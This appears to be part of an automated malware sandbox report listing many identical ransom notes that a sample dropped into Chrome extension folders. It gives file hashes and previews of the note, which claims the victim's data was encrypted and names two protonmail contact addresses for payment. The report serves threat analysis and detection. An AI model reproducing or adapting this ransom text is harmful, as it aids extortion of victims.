                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
